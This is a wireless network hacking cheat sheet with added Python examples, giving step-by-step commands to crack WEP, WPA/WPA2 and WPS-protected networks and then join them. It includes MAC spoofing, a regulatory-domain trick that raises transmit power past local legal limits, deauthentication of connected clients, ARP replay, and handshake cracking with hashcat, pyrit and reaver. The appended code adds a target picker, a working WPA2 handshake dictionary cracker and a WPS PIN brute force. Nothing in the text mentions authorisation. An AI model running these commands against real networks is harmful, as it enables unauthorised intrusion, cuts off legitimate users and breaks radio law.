Wireless Network Hacking Cheat Sheet v1.1 - Created 2014-05-12 by Michael Allen

Follow the numbered sections in order to crack the encryption of a wireless network.

CHEAT SHEET KEY
Mandatory instructions
Optional instructions (Optional)
Recommended but optional instructions
# Commands
$bssid – Wireless access point MAC
$client – Client device MAC
$mymac – Wireless interface MAC
$chan – Channel of the target network
$ESSID – Network's ESSID/network name

01. SETUP

Stop programs that might interfere with network settings (optional):
# service network-manager stop
# killall -9 dhclient wpa_supplicant

Take the wireless adapter down for settings changes:
# ifconfig wlan0 down

Spoof the MAC address (recommended):
# ifconfig wlan0 hw ether 00:11:22:33:44:55
OR:
# macchanger -m 00:11:22:33:44:55 wlan0

Put the card into monitor mode (Optional. May cause problems.) Use mon0 for later commands instead of wlan0 if you do this.
# airmon-ng start wlan0
# airmon-ng ← to check that it worked

Increase transmit power (recommended). Setting the regulatory domain to BO (Bolivia) is what makes the driver accept 30 dBm; the legal limit where you are may be lower.
# iw reg set BO
# iwconfig wlan0 txpower 30

Bring the interface back up to apply changes:
# ifconfig wlan0 up

02. BEGIN CAPTURING TRAFFIC

Start airodump-ng and log captured traffic to a file:
# airodump-ng wlan0 -w output-file-prefix

While capturing traffic with airodump-ng, check that traffic to see if APs support WPS. This saves you from having to sniff traffic twice.
# wash -C -f output-file-prefix-*.cap

03. FOCUS ON THE TARGET NETWORK

Stop the currently running airodump-ng (CTRL+C).

Run airodump-ng focused only on the target network:
# airodump-ng wlan0 -w output-file-prefix --channel $chan --bssid $bssid

A number is appended to the end of output-file-prefix every time, so it is OK to use the same prefix multiple times – it will not overwrite your saved data.

03.a. UNCOVER HIDDEN ESSID

You must capture a Probe frame sent by a client machine as it connects to the network.

Passive: Wait. Eventually it will happen on its own and the ESSID will appear in either the top (access points) or bottom (clients) portion of the currently running airodump-ng.

Active: Deauthenticate a connected client and capture the Probe when it reconnects:
# aireplay-ng -0 5 -a $bssid wlan0
For best results, specify the client MAC address too:
# aireplay-ng -0 5 -a $bssid -c $client wlan0
The ESSID will be shown next to the connected client in airodump-ng once it is captured.

04. IDENTIFY AND CRACK ENCRYPTION

Protip: Use the access point's MAC address to find the manufacturer. Then search by manufacturer or ESSID for exploits and default wireless keys for that model.

04.a. CRACKING WEP (p74/pdf85)

For WEP you have to capture enough data (IVs) to calculate the key.

Open a new terminal window, and begin cracking the data packets you're capturing with airodump-ng:
# aircrack-ng -a 1 -l output-cracked-key.txt output-file-prefix-01.cap

If you need to stop and start again later, that is OK. Aircrack-ng can combine the data from multiple .cap files:
# aircrack-ng -a 1 -l output-cracked-key.txt output-file-prefix-*.cap

Let this continue to run while you do the next steps.

Passive: Wait for enough traffic to pass across the network to crack the key. You can see how many data frames have been captured in airodump-ng's #Data column.

Active: Generate more traffic on the network by using aireplay-ng to do an ARP replay attack. This will speed things up significantly if data is coming in slowly. Open another new window and run:
# aireplay-ng -3 -b $bssid -h $client wlan0

If it is taking a while to capture any ARP requests, you can try to speed that up too by opening another window and deauthenticating the client while aireplay-ng is running. When it reconnects it will send an ARP request:
# aireplay-ng -0 5 -a $bssid -c $client wlan0

Once the key is cracked, aircrack-ng will display it on screen and save it to output-cracked-key.txt.

04.b. CRACKING WPA/WPA2 (p85/pdf96)

1. Capture the 4-way handshake. This happens when a client device connects to the network. The already running airodump-ng will do this part. On success, airodump-ng displays:
[ WPA Handshake: 00:00:00:00:00:00
in the top right.

Passive: Wait for a device to connect to the network.

Active: Deauthenticate a device currently connected to the network and capture the handshake as it reconnects. In a new terminal window:
Disconnect one:
# aireplay-ng -0 5 -a $bssid -c $client wlan0
OR disconnect them all:
# aireplay-ng -0 5 -a $bssid wlan0

2. Verify the captured handshake. Sometimes you don't get it even if airodump-ng says you did.
# cowpatty -c -r output-file-prefix-01.cap

3. Crack the key (multiple options).

a. Cracking with hashcat/oclhashcat. Best option: multi-core/GPU support, can pause/resume, etc.
Convert the .cap file to a hashcat .hccap file:
# aircrack-ng output-file-prefix-01.cap -J output-file-prefix
Crack the password:
# ./hashcat-cli64.bin -n #ofCores -m 2500 -a 0 -o CRACKED.txt output-file-prefix.hccap wordlist.txt
(Newer hashcat releases, 6.x onward, replaced mode 2500 with mode 22000, which takes a hash file made with hcxpcapngtool instead of an .hccap file.)

b. Cracking with pyrit (supports multiple cores)
Using pyrit with a wordlist:
# pyrit -r output-file-prefix-01.cap -i wordlist.txt -e "$ESSID" -o pyrit-output.txt attack_passthrough
Using pyrit with genpmk tables:
# pyrit -r output-file-prefix-01.cap -i rainbow.pmk -e "$ESSID" -o pyrit-output.txt attack_cowpatty

04.b+ CRACKING WPS-ENABLED WPA/WPA2

Usually the only practical way to crack WPA if the password is not in your list.

Close the running airodump-ng.

Bruteforce the WPS PIN:
# reaver -vv -i mon0 -b $bssid -e $ESSID -c $chan --mac=$mymac

Capture the 4-way handshake and begin cracking it (04.b). Then attack WPS. If one attack fails or takes too long, the other may succeed.

05. CONNECT TO THE NETWORK

Disable monitor mode. Enable managed mode.
# ifconfig wlan0 down
# airmon-ng stop wlan0
# iwconfig wlan0 mode managed
# ifconfig wlan0 up

Connect to a specific access point on the network:
# iwconfig wlan0 essid $ESSID ap $bssid
OR connect to ANY access point on the network:
# iwconfig wlan0 essid $ESSID ap any

Connect using WEP:
# iwconfig wlan0 essid $ESSID key $PASSWORD && dhclient wlan0

Connect using WPA/WPA2:
Stop interfering programs (see setup).
Create wpa_supplicant.conf:
# wpa_passphrase $ESSID $PASSWORD > wpa_supplicant.conf
Connect to the network:
# wpa_supplicant -cwpa_supplicant.conf -iwlan0 -B && dhclient wlan0

Recommended resources:
BackTrack 5 Wireless Penetration Testing
www.routerpwn.com
www.renderlab.net/projects/WPA-tables
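Choosing the target from the capture (sections 03 and 04): airodump-ng -w output-file-prefix also writes output-file-prefix-01.csv beside the .cap, listing every access point and station it saw. The script below is an added example, not part of the cheat sheet or of the aircrack-ng suite. It parses that CSV to fill in $bssid, $chan and $client for one network, lists hidden ESSIDs (03.a) and says whether 04.a (WEP) or 04.b (WPA/WPA2) applies. The sample CSV is constructed with hypothetical values in the column layout airodump-ng writes as I know it (access points, a blank line, then stations); verify the header line against your own capture before relying on it.

```python
"""Resolve $bssid / $chan / $client from an airodump-ng CSV log (added example)."""
import csv
import io
from typing import Dict, List, Optional, Tuple

# CONSTRUCTED sample in airodump-ng's CSV layout; every MAC, time and count is hypothetical.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2014-05-12 10:00:01, 2014-05-12 10:05:30,  6,  54, WPA2, CCMP, PSK, -40,      120,       0,   0.  0.  0.  0,   7, CorpNet,
AA:BB:CC:DD:EE:FF, 2014-05-12 10:00:03, 2014-05-12 10:05:29, 11,  54, WEP, WEP, , -67,       80,    3120,   0.  0.  0.  0,   6, OldLab,
DE:AD:BE:EF:00:01, 2014-05-12 10:00:05, 2014-05-12 10:05:20,  1,  54, WPA2, CCMP, PSK, -80,       40,       0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2014-05-12 10:01:00, 2014-05-12 10:05:30, -50,      300, 00:11:22:33:44:55, CorpNet
C0:FF:EE:00:00:01, 2014-05-12 10:02:00, 2014-05-12 10:05:10, -60,       12, (not associated), Coffee,Guest
"""


def parse_airodump_csv(text: str) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
    """Return (access_points, stations) as lists of dicts keyed by the CSV column names."""
    ap_part, _, sta_part = text.strip().partition("\n\n")  # the two sections are separated by a blank line

    def rows(block: str) -> List[Dict[str, str]]:
        reader = csv.reader(io.StringIO(block), skipinitialspace=True)  # airodump uses ", " as separator
        header = [h.strip() for h in next(reader)]
        out = []
        for r in reader:
            if not r:
                continue
            # The last column (Key / Probed ESSIDs) may itself contain commas: fold the overflow back in.
            fixed = r[:len(header) - 1] + [",".join(r[len(header) - 1:])]
            out.append({k: v.strip() for k, v in zip(header, fixed)})
        return out

    return rows(ap_part), rows(sta_part)


def hidden_aps(aps: List[Dict[str, str]]) -> List[str]:
    """BSSIDs that do not broadcast an ESSID; section 03.a applies to these."""
    return [ap["BSSID"] for ap in aps if ap["ESSID"] == ""]


def pick_target(aps: List[Dict[str, str]], stations: List[Dict[str, str]],
                essid: Optional[str] = None, bssid: Optional[str] = None) -> Dict[str, object]:
    """Fill in the cheat sheet's variables for one network and name the crack section that applies."""
    matches = [ap for ap in aps
               if (bssid and ap["BSSID"].lower() == bssid.lower()) or (essid and ap["ESSID"] == essid)]
    if len(matches) != 1:
        raise LookupError(f"expected exactly one access point, found {len(matches)}")
    ap = matches[0]
    privacy = ap["Privacy"]
    if privacy.startswith("WPA"):
        section = "04.b"
    elif privacy == "WEP":
        section = "04.a"
    else:
        section = None  # open network: nothing to crack
    clients = [s["Station MAC"] for s in stations if s["BSSID"].lower() == ap["BSSID"].lower()]
    return {
        "bssid": ap["BSSID"],
        "chan": int(ap["channel"]),
        "essid": ap["ESSID"],
        "privacy": privacy,
        "ivs": int(ap["# IV"]),   # WEP: how much data airodump-ng has captured so far
        "clients": clients,       # candidates for $client in the deauth / ARP replay commands
        "section": section,
    }


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print("hidden:", hidden_aps(aps))
    print(pick_target(aps, stations, essid="CorpNet"))
```

Point it at your own output-file-prefix-01.csv with open(...).read() in place of SAMPLE_CSV; the station list also shows which clients are associated, which is what the deauth commands in 03.a and 04.b need.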
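What "cracking the handshake" (04.b, step 3) actually computes, as an added example that is not part of the cheat sheet and not aircrack-ng, pyrit or hashcat code. Every tool listed there does the same work: derive the PMK from a candidate passphrase and the ESSID with PBKDF2, expand it to the PTK with the two MAC addresses and two nonces from the handshake, and check whether the resulting KCK reproduces the MIC on a captured EAPOL frame. The handshake material below (MACs, nonces, EAPOL frame, wordlist) is constructed for the demo; the only real-world value is the PBKDF2 test vector (passphrase "password", SSID "IEEE") from IEEE 802.11-2004 Annex H, which pins the PMK step to the standard. The has_mic() check is step 2 of 04.b in code: message 1 of the handshake carries no MIC, so a capture that holds only that frame cannot be cracked whatever airodump-ng reports.

```python
"""Minimal dictionary attack on a WPA2-PSK 4-way handshake (added example, standard library only)."""
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of Key Descriptor fields before the Key MIC
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK from PMK, both MACs and both nonces (min/max makes the order irrelevant)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits covers the 512 needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with the MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 truncated to 128 bits."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


class Handshake:
    """What a cracker needs from the capture: ESSID, AP MAC, client MAC, ANonce, SNonce, one MIC'd EAPOL frame."""
    def __init__(self, essid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, eapol: bytes):
        self.essid, self.aa, self.spa, self.anonce, self.snonce, self.eapol = essid, aa, spa, anonce, snonce, eapol

    @property
    def key_info(self) -> int:
        return int.from_bytes(self.eapol[5:7], "big")

    @property
    def version(self) -> int:
        return self.key_info & 0x0007  # key descriptor version, low 3 bits of Key Information

    def has_mic(self) -> bool:
        """The 'verify the handshake' step: the Key MIC bit must be set and the field must not be all zero."""
        mic = self.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
        return bool(self.key_info & 0x0100) and any(mic)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    if not hs.has_mic():
        raise ValueError("EAPOL frame carries no MIC: handshake incomplete, capture again (04.b step 2)")
    target = hs.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrase length rule: skip what cannot be right
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, hs.essid), hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.version), target):
            return candidate
    return None


def build_msg2(snonce: bytes, kck: bytes, version: int = 2) -> bytes:
    """Construct handshake message 2 (client -> AP) with a valid MIC; demo only, layout per 802.11i."""
    key_info = 0x0100 | 0x0008 | version  # Key MIC set, Pairwise set, descriptor version
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big") + b"\x00" * 8  # type, info, len, replay
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                                # nonce, IV, RSC, ID
            + b"\x00" * MIC_LEN + (0).to_bytes(2, "big"))                                       # MIC placeholder, key data len
    frame = bytes([1, 3]) + len(body).to_bytes(2, "big") + body                                 # EAPOL v1, type 3 = Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, version) + frame[MIC_OFFSET + MIC_LEN:]


def demo_handshake(passphrase: str = "password", essid: str = "IEEE") -> Handshake:
    """CONSTRUCTED handshake material: hypothetical MACs and nonces, MIC computed from the passphrase."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, essid), aa, spa, anonce, snonce)[:16]
    return Handshake(essid, aa, spa, anonce, snonce, build_msg2(snonce, kck))


WORDLIST = ["12345678", "letmein1", "admin", "Password", "password", "hunter22"]  # constructed

if __name__ == "__main__":
    print("PMK:", pmk_from_passphrase("password", "IEEE").hex())
    print("cracked:", crack(demo_handshake(), WORDLIST))
```

With a real capture the tools above pull the MACs, nonces and EAPOL frame out of the .cap for you. The PBKDF2 step is the expensive one, which is why hashcat's GPU support and pyrit's precomputed PMK tables matter, and why a genpmk/rainbow table is only good for the one ESSID it was built for.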
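Why the WPS PIN brute force in 04.b+ finishes in hours rather than years, as an added example that is not part of the cheat sheet and not reaver code. It goes a little beyond the cheat sheet text: the 8-digit PIN's last digit is a checksum, and the registrar exchange tells the attacker separately whether the first four digits were right (NACK after M4) and whether the next three were right (NACK after M6), so the worst case is 10^4 + 10^3 = 11,000 attempts instead of 10^8. The AccessPoint class is a constructed oracle standing in for a real AP; the PIN 12345670 is the usual example of a checksum-valid PIN.

```python
"""Two-phase WPS PIN search against a constructed registrar oracle (added example)."""
from typing import Optional


def wps_checksum(first7: int) -> int:
    """Checksum digit for the 7-digit PIN body (digit weights 3,1,3,1,3,1,3 from the left)."""
    accum, pin = 0, first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


class AccessPoint:
    """CONSTRUCTED oracle: answers like a WPS registrar that leaks each PIN half separately."""
    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must carry a valid checksum digit")
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "M4_NACK"  # first half wrong: AP aborts before M5
        if pin[4:] != self._pin[4:]:
            return "M6_NACK"  # first half right, second half wrong
        return "OK"           # M7 would follow, carrying the WPA passphrase


def crack_wps_pin(ap: AccessPoint) -> Optional[str]:
    """Mirror reaver's search: up to 10,000 first halves, then up to 1,000 second halves."""
    first = None
    for i in range(10_000):
        if ap.try_pin(f"{i:04d}0000") != "M4_NACK":  # anything but an M4 NACK means the first half is right
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        body = first + f"{j:03d}"
        pin = body + str(wps_checksum(int(body)))  # only 3 digits are free; the 8th is derived
        if ap.try_pin(pin) == "OK":
            return pin
    return None


if __name__ == "__main__":
    ap = AccessPoint("12345670")
    print(crack_wps_pin(ap), "after", ap.attempts, "attempts")
```

reaver's rate is bounded by the AP, not by this loop: each attempt is a full WPS exchange over the air, and many APs lock WPS after a burst of failures, which is why the cheat sheet suggests running the handshake crack from 04.b alongside the WPS attack.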
